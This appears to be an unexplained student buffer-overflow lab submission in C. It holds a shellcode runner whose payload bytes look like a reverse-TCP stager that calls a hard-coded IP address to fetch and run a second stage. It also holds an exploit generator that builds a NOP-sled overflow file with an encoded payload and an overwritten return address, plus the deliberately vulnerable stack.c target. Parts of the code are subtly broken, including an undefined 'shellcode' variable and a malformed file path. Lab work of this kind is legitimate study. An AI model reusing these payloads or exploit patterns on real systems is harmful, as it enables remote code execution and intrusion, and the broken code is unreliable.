shellcode

Call shellcode.c

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

unsigned char buf[] =

"\x6a\x0a\x5e\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66"

"\x89\xe1\xcd\x80\x97\x5b\x68\xc0\xa8\x03\x48\x68\x02\x00"

"\x22\x90\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd"

"\x80\x85\xc0\x79\x19\x4e\x74\x3d\x68\xa2\x00\x00\x00\x58"

"\x6a\x00\x6a\x05\x89\xe3\x31\xc9\xcd\x80\x85\xc0\x79\xbd"

"\xeb\x27\xb2\x07\xb9\x00\x10\x00\x00\x89\xe3\xc1\xeb\x0c"

"\xc1\xe3\x0c\xb0\x7d\xcd\x80\x85\xc0\x78\x10\x5b\x89\xe1"

"\x99\xb2\x6a\xb0\x03\xcd\x80\x85\xc0\x78\x02\xff\xe1\xb8"

"\x01\x00\x00\x00\xbb\x01\x00\x00\x00\xcd\x80";

int main(int argc, char **argv)

{    

       int (*func)() = (int(*)())buf;  

       func();  

       return 1;

}

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

unsigned char buf[] = 
"\xdb\xd9\xbe\xa1\x3a\x0d\x3e\xd9\x74\x24\xf4\x5a\x29\xc9"
"\xb1\x1f\x31\x72\x1a\x83\xc2\x04\x03\x72\x16\xe2\x54\x50"
"\x07\x60\xa7\x7e\xe0\x7f\x94\xc3\x5c\xea\x18\x74\x04\x63"
"\xfd\xb9\x49\xe4\xa6\x29\x8a\xa3\x5b\xe2\x62\xb6\x5b\xd0"
"\xe2\x3f\xba\x7e\x65\x18\x6c\x2e\x3e\x11\x6d\x93\x0d\xa1"
"\xe8\xd4\xf7\xbb\xbc\xa0\x3a\xd4\xe2\x49\x45\x24\xba\x23"
"\x45\x4e\x3f\x3d\xa6\xbf\xf6\xf0\xa9\x45\xc8\x72\x17\xae"
"\xef\x36\x60\x88\xef\x26\x6f\xea\x66\xa5\xae\x01\x74\xeb"
"\xd2\xda\x34\x96\xd9\x63\xb1\xa9\x9a\x73\xe2\xa0\xba\xed"
"\xa6\xd9\x8c\x0d\x0b\x9d\x68\xd1\xeb\x9c\x8d\x33\xb3\xa0"
"\x71\xb4\xc3\x19\x70\xb4\xc3\x5d\xbe\x34";

void main(int argc, char **argv )
{

        char buffer[517];
        FILE *badfile;
        /* Initialize buffer with 0x90 (NOP instruction) */
        memset (&buffer, 0x90, 517) ;
        /* You need to fill the buffer with appropriate contents here*/
        strcpy(buffer+100, shellcode);
        strcpy(buffer+0x24, "\xcb\xeb\xff\xbf");

        badfile = fopen(". /badfile","w");
        fwrite(buffer, 517, 1, badfile) ;
        fclose (badfile);

}

stack.c:

/* Vunlerable program: stack.c */ /* You can get this program from the lab's website */ #include <stdlib.h> #include <stdio.h> #include <string.h> #ifndef BUF_SIZE #define BUF_SIZE 24 #endif int bof(char *str) {     char buffer[BUF_SIZE];     /* The following statement has a buffer overflow problem */     strcpy(buffer, str);           return 1; } int main(int argc, char **argv) {     char str[517];     FILE *badfile;     char dummy[BUF_SIZE];  memset(dummy, 0, BUF_SIZE);     badfile = fopen("badfile", "r");     fread(str, sizeof(char), 517, badfile);     bof(str);     printf("Returned Properly\n");     return 1; }